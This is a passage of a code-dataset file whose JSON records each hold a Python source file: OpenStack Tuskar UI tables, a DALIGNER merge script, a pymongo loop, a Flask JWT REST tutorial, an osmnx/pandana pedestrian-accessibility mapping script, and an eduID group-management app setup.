link=(\"horizon:infrastructure:\"\n \"resource_management:flavor_templates:detail\"),\n verbose_name=_('Flavor Template Name'))\n cpu = tuskar_tables.Column(\n \"cpu\",\n verbose_name=_('VCPU'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n memory = tuskar_tables.Column(\n \"memory\",\n verbose_name=_('RAM (MB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n storage = tuskar_tables.Column(\n \"storage\",\n verbose_name=_('Root Disk (GB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n ephemeral_disk = tuskar_tables.Column(\n \"ephemeral_disk\",\n verbose_name=_('Ephemeral Disk (GB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n swap_disk = tuskar_tables.Column(\n \"swap_disk\",\n verbose_name=_('Swap Disk (MB)'),\n filters=(lambda x: getattr(x, 'value', ''),)\n )\n\n class Meta:\n name = \"flavor_templates\"\n verbose_name = _(\"Flavor Templates\")\n table_actions = (CreateFlavorTemplate,\n DeleteFlavorTemplates,\n FlavorTemplatesFilterAction)\n row_actions = (EditFlavorTemplate, DeleteFlavorTemplates)\n", "sub_path": "tuskar_ui/infrastructure/resource_management/flavor_templates/tables.py", "file_name": "tables.py", "file_ext": "py", "file_size_in_byte": 3262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 29, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 30, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 31, "usage_type": "call"}, {"api_name": "tuskar_ui.api.FlavorTemplate.delete", "line_number": 34, "usage_type": "call"}, {"api_name": "tuskar_ui.api.FlavorTemplate", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tuskar_ui.api", "line_number": 34, "usage_type": "name"}, {"api_name": "horizon.tables.LinkAction", "line_number": 37, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 37, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 39, "usage_type": "call"}, {"api_name": "horizon.tables.LinkAction", "line_number": 44, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 44, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 46, "usage_type": "call"}, {"api_name": "horizon.tables.FilterAction", "line_number": 51, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 51, "usage_type": "name"}, {"api_name": "tuskar_ui.tables.DataTable", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tuskar_ui.tables", "line_number": 60, "usage_type": "name"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 61, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 64, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 65, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 67, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 70, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 70, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 72, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 75, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 75, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 77, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 80, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 80, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 82, "usage_type": "call"}, {"api_name": "tuskar_ui.tables.Column", "line_number": 85, "usage_type": "call"}, {"api_name": "tuskar_ui.tables", "line_number": 85, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 87, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "111771503", "text": "import argparse\nimport collections\nimport os\nimport re\nimport sys\n\nimport io_io\n\n\ndef merge_split( las_paths_fn,dbname=\"raw_reads\"):\n\n las_paths = io_io.deserialize(las_paths_fn)\n\n re_las_pair = re.compile(r'{db}\\.(\\d+)\\.{db}\\.(\\d+)\\.las$'.format(db=dbname))\n las_map = collections.defaultdict(list)\n for path in las_paths:\n mo = re_las_pair.search(path)\n if not mo:\n msg = '{!r} does not match regex {!r}'.format(\n path, re_las_pair.pattern)\n raise Exception(msg)\n a, b = int(mo.group(1)), int(mo.group(2))\n las_map[a].append(path)\n\n for i, block in enumerate(las_map):\n job_id = 'm_{:05d}'.format(i)\n\n # Write the las files for this job.\n input_dir = os.path.join('merge-scripts', job_id)\n las_paths_fn = os.path.join('.', input_dir, 'las-paths.json')\n io_io.mkdirs(input_dir)\n las_paths = las_map[block]\n io_io.serialize(las_paths_fn, las_paths)\n\ndef parse_args(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--las-fn', required=True,\n help='ignored for now, but non-zero will mean \"No more than this.\"',\n )\n\n\n args = parser.parse_args(argv[1:])\n return args\n\n\ndef main(argv=sys.argv):\n args = parse_args(argv)\n merge_split(args.las_fn)\n # rep_combine(\"a.db\",\"test.json\",3,\"\")\n\n\nif __name__ == \"__main__\":\n main()", "sub_path": "script/merge_daligner_las.py", "file_name": "merge_daligner_las.py", "file_ext": "py", "file_size_in_byte": 1407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "io_io.deserialize", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 14, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "io_io.mkdirs", "line_number": 31, "usage_type": "call"}, {"api_name": "io_io.serialize", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 48, "usage_type": "attribute"}]}
+{"seq_id": "104229965", "text": "from pymongo import MongoClient\nimport datetime\n\nmongo = MongoClient()\ndataset = mongo[\"primer\"][\"dataset\"]\ndataset2 = mongo[\"primer2\"][\"dataset\"]\n\nresults = dataset.find()\n\ni = 0\nfor result in results:\n # delta = datetime.timedelta(seconds = int(result[\"attributes\"][\"SCENEDATE\"] / 1000))\n # realdatetime = datetime.datetime(1970, 1, 1, 0, 0, 0) + delta\n # print(result[\"attributes\"][\"METADATAID\"], realdatetime)\n break\n # dataset2.update({\"_id\": result[\"_id\"]}, {\"$set\": {\"dt\": result[\"attributes\"][\"SCENEDATE\"]}})\n i = i + 1\n if i % 10000 == 0:\n print(i, \"done\")\nprint(i)", "sub_path": "updatePrimer2withDateTime.py", "file_name": "updatePrimer2withDateTime.py", "file_ext": "py", "file_size_in_byte": 602, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pymongo.MongoClient", "line_number": 4, "usage_type": "call"}]}
+{"seq_id": "8713499", "text": "from flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom secure_check import authenticate,identity\nfrom flask_jwt import JWT ,jwt_required\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'mysecretkey'\napi = Api(app)\n\njwt = JWT(app, authenticate, identity)\n\n# Later on this will be a model call to our database!\n# Right now its just a list of dictionaries\n# puppies = [{'name':'Rufus'},{name:'Frankie'},......]\n# Keep in mind, its in memory, it clears with every restart!\npuppies = []\n\nclass PuppyNames(Resource):\n def get(self,name):\n print(puppies)\n\n # Cycle through list for puppies\n for pup in puppies:\n if pup['name'] == name:\n return pup\n\n # If you request a puppy not yet in the puppies list\n return {'name':None},404\n\n def post(self, name):\n # Add the dictionary to list\n pup = {'name':name}\n puppies.append(pup)\n # Then return it back\n print(puppies)\n return pup\n\n def delete(self,name):\n\n # Cycle through list for puppies\n for ind,pup in enumerate(puppies):\n if pup['name'] == name:\n # don't really need to save this\n delted_pup = puppies.pop(ind)\n return {'note':'delete successful'}\n\n\n\n\nclass AllNames(Resource):\n\n @jwt_required()\n def get(self):\n # return all the puppies :)\n return {'puppies': puppies}\n\n\napi.add_resource(PuppyNames, '/puppy/')\napi.add_resource(AllNames,'/puppies')\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "sub_path": "Flask/09-REST-APIs-with-Flask/02-REST-API-Authorization/auth_api.py", "file_name": "auth_api.py", "file_ext": "py", "file_size_in_byte": 1587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_jwt.JWT", "line_number": 10, "usage_type": "call"}, {"api_name": "secure_check.authenticate", "line_number": 10, "usage_type": "argument"}, {"api_name": "secure_check.identity", "line_number": 10, "usage_type": "argument"}, {"api_name": "flask_restful.Resource", "line_number": 18, "usage_type": "name"}, {"api_name": "flask_restful.Resource", "line_number": 50, "usage_type": "name"}, {"api_name": "flask_jwt.jwt_required", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "68300422", "text": "import copy\nimport json\nimport itertools\nfrom correlation import explainable_variance\n\n\nraw_data = json.loads(open('res.json', 'r').read())['finalResult']\n\ntag = ['latency', 'bandwidth', 'nodeCount', 'imageCount',\n 'textCount', 'cssCount', 'cssRuleCount', 'usedCssCount']\n\npredictor = [[] for i in range(len(tag))]\ncriterion = []\n\nfor entry in raw_data:\n for i in range(len(tag)):\n predictor[i].append(entry[tag[i]])\n # criterion.append(max(entry['top5Layout']))\n criterion.append(sum(entry['top5Layout']))\n\n# Dominance Analysis (DA)\n# Given all subset of predictors, if predictor A contributes more than predictor B, then A *completely* dominates B.\n# Predictor's contribution is characterized by the augment of explainable variance.\n\n# Step 1: Generate all subsets of predictors.\ncomplete_set = set(range(len(tag)))\nall_subsets = []\n\nfor i in range(len(tag)-1):\n fix_sized_subsets = itertools.combinations(complete_set, i+1)\n for subset in fix_sized_subsets:\n all_subsets.append(list(subset))\n\n\ndef format_predictor(data, idx):\n sample_size = len(data[0])\n fp = []\n for i in range(sample_size):\n entry = []\n for v in idx:\n entry.append(data[v][i])\n fp.append(entry)\n return fp\n\n\noutput = open('da.txt', 'w')\n\n# Step 2: Calculate predictors' additional contribution (AC).\ndominance_matrix = [[0 for i in range(len(tag))] for i in range(len(tag))]\n\nfor i in range(len(tag)-1):\n for j in range(i+1, len(tag)):\n output.write('Predictor: {}, {}\\n'.format(tag[i], tag[j]))\n\n # First, compare predictors' additional contribution to empty set.\n # Which equals to the explainable variance of the regression on the predictor and criterion alone.\n ac_i = explainable_variance(\n format_predictor(predictor, [i]), criterion)\n ac_j = explainable_variance(\n format_predictor(predictor, [j]), criterion)\n\n output.write('{} {}\\n'.format(ac_i, ac_j))\n if ac_i > ac_j:\n dominance_matrix[i][j] += 1\n elif ac_j > ac_i:\n dominance_matrix[j][i] += 1\n\n # Then, compare predictors' additional contribution across all non-empty sets that they are not included.\n # The ordering of predictors are not considered yet.\n for subset in all_subsets:\n if (not i in subset) and (not j in subset):\n original = explainable_variance(\n format_predictor(predictor, subset), criterion)\n\n ss = copy.deepcopy(subset)\n ss.append(i)\n ac_i = explainable_variance(\n format_predictor(predictor, ss), criterion)\n\n ss = copy.deepcopy(subset)\n ss.append(j)\n ac_j = explainable_variance(\n format_predictor(predictor, ss), criterion)\n\n output.write('{} {} {}\\n'.format(original, ac_i, ac_j))\n\n if ac_i > ac_j:\n dominance_matrix[i][j] += 1\n elif ac_j > ac_i:\n dominance_matrix[j][i] += 1\n\n output.write('\\n')\n\nac = explainable_variance(format_predictor(\n predictor, range(len(tag))), criterion)\nprint(ac)\n\nfor i in range(len(tag)-1):\n for j in range(i+1, len(tag)):\n v1 = dominance_matrix[i][j]\n v2 = dominance_matrix[j][i]\n\n prop = v1 / (v1+v2)\n if prop >= 0.5:\n print('{} {} {:.2f}'.format(tag[i], tag[j], prop))\n else:\n print('{} {} {:.2f}'.format(tag[j], tag[i], 1-prop))\n", "sub_path": "layout/src/v0/dominance_analysis.py", "file_name": "dominance_analysis.py", "file_ext": "py", "file_size_in_byte": 3553, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "json.loads", "line_number": 7, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 30, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 57, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 59, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 72, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 75, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 77, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 80, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 82, "usage_type": "call"}, {"api_name": "correlation.explainable_variance", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "443579970", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\nInspired by the example described in \nhttps://towardsdatascience.com/measuring-pedestrian-accessibility-97900f9e4d56\n\nChunks of code taken from \nhttp://kuanbutts.com/2017/08/08/how-to-pdna/\n\nBeware: multiple bugs needed to be sorted out in order to install all the necessary libraries\n\nCreated on Sat Dec 29 22:17:24 2018\n\n@author: Les\n\"\"\"\n\nprint(\"\\nLoading libraries\")\nimport os \nos.environ[\"PROJ_LIB\"] = \"C:\\\\Users\\\\Bonny\\\\Anaconda3\\\\Lib\\\\site-packages\\\\pyproj\\\\data\"\nimport pandas as pd\nfrom copy import copy\n#import mpl_toolkits\n#mpl_toolkits.__path__.append(\"C:\\\\Users\\\\Bonny\\\\Anaconda3\\\\Lib\\\\site-packages\\\\mpl_toolkits\")\nfrom mpl_toolkits.basemap import Basemap ### needs basemap lib: conda install -c conda-forge basemap\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom mpl_toolkits.axes_grid1.colorbar import colorbar\nimport matplotlib.pyplot as plt\n\nimport osmnx as ox\nimport pandana as pdna\nfrom pandana.loaders import osm\n\nfrom shapely.geometry import Point, Polygon, MultiPolygon\nfrom descartes import PolygonPatch\n\nfrom accessibility_helpers import *\n\n\n\nmelbourne_bbox = {'south':-37.83, 'west':144.855 ,'north':-37.73, 'east':145.010}\nmelbourne_house_poi = Point( 144.97766, -37.75807) # our house, Lincoln Street\n\ntorino_bbox = {'south':45.005, 'west':7.578 ,'north':45.140, 'east':7.773}\ntorino_house_poi = Point(7.6486667, 45.0656553) # Dario's house\n#torino_bbox = {'south':44.85, 'west':7.6118697 ,'north':45.25, 'east':7.6973155}\n\ncity_name = 'Torino'\nmax_dist = 3000 #CONSIDER ONLY AMENITIES WITHIN THIS DISTANCE (IN METERS)\nmax_pois = 3 #consider a max number of points of interest (always within the max distance)\n\n\nif city_name=='Torino':\n bbox = torino_bbox\n house_poi = torino_house_poi\nelif city_name=='Melbourne':\n bbox = melbourne_bbox\n house_poi = melbourne_house_poi\nelse:\n raise ValueError('Invalid city name {}'.format(city_name))\n\n\n### EXTRACT OPENSOURCEMAP NETWORK INFORMATION\nprint(\"\\nExtracting OpenSourceMap network info with osmnx\")\n### Use the osmnx library; full documents and examples at\n### https://github.com/gboeing/osmnx\n\n### one can select specifiic areas...\n#places = ['Melbourne, Victoria, Australia', 'Carlton, Victoria, Australia', \n# 'North Melbourne, Victoria, Australia', 'Parkville, Victoria, Australia',\n# 'Brunswick, Victoria, Australia', 'Brunswick East, Victoria, Australia', \n# 'Brunswick West, Victoria, Australia', 'Fitzroy, Victoria, Australia', \n# 'Fitzroy North, Victoria, Australia','Richmond, Victoria, Australia' ]\n#\n#G = ox.graph_from_place(places, network_type='drive')#distance=2000, distance_type='bbox')\n\n### ...or pick everything within a certain radius...\n#network_centre_coords = ( -37.813, 144.944) # Melbourne\n#network_radius = 7000 # in meters\n#G = ox.graph_from_point(network_centre_coords, distance=network_radius, network_type='drive')\n\n### or pass directly a bounding box of lat/lon coordinates\n\nG = ox.graph_from_bbox(bbox['north'], bbox['south'], bbox['east'], bbox['west'], network_type='drive')\n\n\n### import also the boundaries of the city\n# get the place shape\ngdf_string = \"\"\nif city_name=='Melbourne':\n gdf_string = \"Melbourne, Victoria, Australia\"\nif city_name=='Torino':\n gdf_string = \"Torino, Italy\"\n \ngdf = ox.gdf_from_place(gdf_string)\n\n###the output G is a networkx multidigraph; can be plotted easily\nprint(\"\\nPlotting network\")\n#nodes = G.nodes\n#edges = G.edges\nfig_height=20\nw_over_h = (bbox['east'] - bbox['west']) / (bbox['north'] - bbox['south']) \nplt.ion()\nfig, ax = ox.plot_graph(G, fig_height=fig_height, fig_width=fig_height*w_over_h, node_size=0, show=False, close=False)\n\n# to this matplotlib axis, add the place shape as descartes polygon patches\nfor geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fc='white', ec='royalblue', linewidth=2, alpha=1, zorder=-1)\n ax.add_patch(patch)\n\n# optionally set up the axes extents all nicely\nmargin = 0.02\ngdf_west, gdf_south, gdf_east, gdf_north = gdf.unary_union.bounds\nmargin_ns = (gdf_north - gdf_south) * margin\nmargin_ew = (gdf_east - gdf_west) * margin\nax.set_ylim((gdf_south - margin_ns, gdf_north + margin_ns))\nax.set_xlim((gdf_west - margin_ew, gdf_east + margin_ew))\n\n#add a red marker for our house\nhouse_patch = PolygonPatch(house_poi.buffer(0.001), fc='red', ec='red', linewidth=3,alpha=1, zorder=1)\nax.add_patch(house_patch)\nax.set_aspect(1)\nfig.savefig('./{}_fig01.png'.format(city_name), bbox_inches='tight')\nplt.gcf().clear()\n\n### extract the nodes and edges from the OSMNX object anc cast them into pandas dataframes\n### The pd df will be then imported into pandana objects\n\n\n\nprint(\"\\nImporting edges into a df\")\nedges_df = create_edges_df(G)\nprint(\"\\nImporting nodes into a df\")\nnodes_df = create_nodes_df(G)\n\n\n# Instantiate a Pandana (pdna) network (net)\nprint(\"\\nCreating pandana network\")\nnet = pdna.Network(nodes_df['x'], nodes_df['y'],\n edges_df['st_node'], edges_df['en_node'],\n edges_df[['weight']])\n\nnet.precompute(max_dist*1.1)\n\n### Now we download the location of interesting amenities via the pandana library\n### We will then overlap them onto the network we have just downloaded above and\n### compute the distances\n\n### define your selected amenities and bounding box\n### full list of amenities: https://wiki.openstreetmap.org/wiki/Map_Features#Amenity\namenities = ['hospital', 'clinic', 'doctors', 'pharmacy', 'dentist', 'school', 'police', 'swimming_pool']# \namenities2 = ['restaurant','cafe','bank','park']\n\n# request them from the OpenStreetMap API (Overpass)\nprint(\"\\nImporting list of Points Of Interest\")\n#all_pois = osm.node_query(bbox['south'], bbox['west'], bbox['north'], bbox['east'])#,tags=\"amenity\")\nall_pois= pd.read_pickle('./{city}_POIs_nodes-and-ways_amenities-only.pkl'.format(city=city_name))\npois = all_pois[all_pois['amenity'].isin(amenities)]\n\nprint(\"\\nComputing accessibility for the closest {} POIs within {} meters\".format(max_pois, max_dist))\nfor amenity in amenities:\n pois_subset = pois.loc[pois['amenity']==amenity , ]\n net.set_pois(category=amenity, maxdist=max_dist, maxitems=max_pois, x_col=pois_subset['lon'], y_col=pois_subset['lat'])\n#### end for loop\n \n### \nn1 = net.nearest_pois(max_dist, amenities[0], num_pois=max_pois, include_poi_ids=True)\nprint(\"\\n***************\")\nprint(n1.describe())\nprint(\"\\n***************\\n\")\n \nfig_size=( fig_height*w_over_h*1.15,fig_height)#add some buffer for the side colorbar\n#if city_name=='Torino':\n# fig_size=(8,10)\n \nfor amenity in amenities:\n print(\"\\nPlotting {}\".format(amenity))\n house_patch2 = PolygonPatch(house_poi.buffer(0.001), fc='red', ec='red', linewidth=3,alpha=1, zorder=1)\n patches = [house_patch2]\n sel_pois = pois.loc[pois['amenity']==amenity, ['amenity','name','lat','lon']]\n for i in range(0,sel_pois.shape[0],1):\n tmp_poi = Point( (sel_pois['lon'].values)[i], (sel_pois['lat'].values)[i])\n patches.append(PolygonPatch(tmp_poi.buffer(0.001), fc='purple', ec='purple', linewidth=3,alpha=1, zorder=1) )\n \n bm, fig, ax = plot_nearest_amenity(net, amenity, 1, list(bbox.values()), max_dist, max_pois, city_name=city_name, \n plot_type='hex', patches=patches, fig_size=fig_size)\n \n # to this matplotlib axis, add the place shape as descartes polygon patches\n for geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fill=False, ec='yellow', linewidth=4, alpha=1, zorder=1)\n ax.add_patch(patch)\n\n #ax.add_patch(house_patch2)\n fig.savefig('./{}_accessibility_{}_hex.png'.format( city_name,amenity), bbox_anchor='tight')\n plt.gcf().clear()\n\n####now same but in scatter plot format\n bmB, figB, axB = plot_nearest_amenity(net, amenity, 1, list(bbox.values()), max_dist, max_pois, city_name=city_name, \n plot_type='scatter', patches=patches, fig_size=fig_size)\n \n # to this matplotlib axis, add the place shape as descartes polygon patches\n for geometry in gdf['geometry'].tolist():\n if isinstance(geometry, (Polygon, MultiPolygon)):\n if isinstance(geometry, Polygon):\n geometry = MultiPolygon([geometry])\n for polygon in geometry:\n patch = PolygonPatch(polygon, fill=False, ec='yellow', linewidth=4, alpha=1, zorder=1)\n axB.add_patch(patch)\n\n #ax.add_patch(house_patch2)\n figB.savefig('./{}_accessibility_{}_scatter.png'.format( city_name,amenity), bbox_anchor='tight')\n plt.gcf().clear()\n", "sub_path": "accessibility.py", "file_name": "accessibility.py", "file_ext": "py", "file_size_in_byte": 8997, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "shapely.geometry.Point", "line_number": 41, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 44, "usage_type": "call"}, {"api_name": "osmnx.graph_from_bbox", "line_number": 83, "usage_type": "call"}, {"api_name": "osmnx.gdf_from_place", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "osmnx.plot_graph", "line_number": 103, "usage_type": "call"}, {"api_name": "shapely.geometry.Polygon", "line_number": 107, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 107, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 108, "usage_type": "argument"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 109, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 111, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "pandana.Network", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 160, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 181, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 185, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 186, "usage_type": "call"}, {"api_name": "shapely.geometry.Polygon", "line_number": 193, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 193, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 194, "usage_type": "argument"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 195, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 210, "usage_type": "name"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 210, "usage_type": "name"}, {"api_name": "shapely.geometry.Polygon", "line_number": 211, "usage_type": "argument"}, {"api_name": "shapely.geometry.MultiPolygon", "line_number": 212, "usage_type": "call"}, {"api_name": "descartes.PolygonPatch", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}]}
+{"seq_id": "80307178", "text": "# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2020 SUNET\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or\n# without modification, are permitted provided that the following\n# conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# 3. Neither the name of the SUNET nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n\nfrom typing import Dict, cast\n\nfrom flask import current_app\n\nfrom eduid_common.api import mail_relay, translation\nfrom eduid_common.authn.middleware import AuthnBaseApp\nfrom eduid_common.config.exceptions import BadConfiguration\nfrom eduid_scimapi.groupdb import ScimApiGroupDB\nfrom eduid_scimapi.userdb import ScimApiUserDB\nfrom eduid_userdb.group_management import GroupManagementInviteStateDB\n\nfrom eduid_webapp.group_management.settings.common import GroupManagementConfig\n\n__author__ = 'lundberg'\n\n\nclass GroupManagementApp(AuthnBaseApp):\n def __init__(self, name: str, config: dict, **kwargs):\n # Initialise type of self.config before any parent class sets a precedent to mypy\n self.config = GroupManagementConfig.init_config(ns='webapp', app_name=name, test_config=config)\n super().__init__(name, **kwargs)\n # cast self.config because sometimes mypy thinks it is a FlaskConfig after super().__init__()\n self.config: GroupManagementConfig = cast(GroupManagementConfig, self.config) # type: ignore\n\n # Init dbs\n if self.config.mongo_uri is None:\n raise BadConfiguration('mongo_uri not set')\n self.invite_state_db = GroupManagementInviteStateDB(self.config.mongo_uri)\n _owner = self.config.scim_data_owner.replace(\n '.', '_'\n ) # dot is a name separator in mongodb, so replace dots with underscores\n self.scimapi_userdb = ScimApiUserDB(db_uri=self.config.mongo_uri, collection=f'{_owner}__users')\n self.scimapi_groupdb = ScimApiGroupDB(\n neo4j_uri=self.config.neo4j_uri,\n neo4j_config=self.config.neo4j_config,\n scope=self.config.scim_data_owner,\n mongo_uri=self.config.mongo_uri,\n mongo_dbname='eduid_scimapi',\n mongo_collection=f'{_owner}__groups',\n )\n # Init celery\n mail_relay.init_relay(self)\n\n # Init translation\n translation.init_babel(self)\n\n\ncurrent_group_management_app = cast(GroupManagementApp, current_app)\n\n\ndef init_group_management_app(name: str, config: Dict) -> GroupManagementApp:\n \"\"\"\n :param name: The name of the instance, it will affect the configuration loaded.\n :param config: any additional configuration settings. Specially useful\n in test cases\n\n :return: the flask app\n \"\"\"\n app = GroupManagementApp(name, config)\n\n # Register views\n from eduid_webapp.group_management.views.group import group_management_views\n from eduid_webapp.group_management.views.invite import group_invite_views\n\n app.register_blueprint(group_management_views)\n app.register_blueprint(group_invite_views)\n\n app.logger.info('{!s} initialized'.format(name))\n return app\n", "sub_path": "src/eduid_webapp/group_management/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4351, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "eduid_common.authn.middleware.AuthnBaseApp", "line_number": 50, "usage_type": "name"}, {"api_name": "eduid_webapp.group_management.settings.common.GroupManagementConfig.init_config", "line_number": 53, "usage_type": "call"}, {"api_name": "eduid_webapp.group_management.settings.common.GroupManagementConfig", "line_number": 53, "usage_type": "name"}, {"api_name": 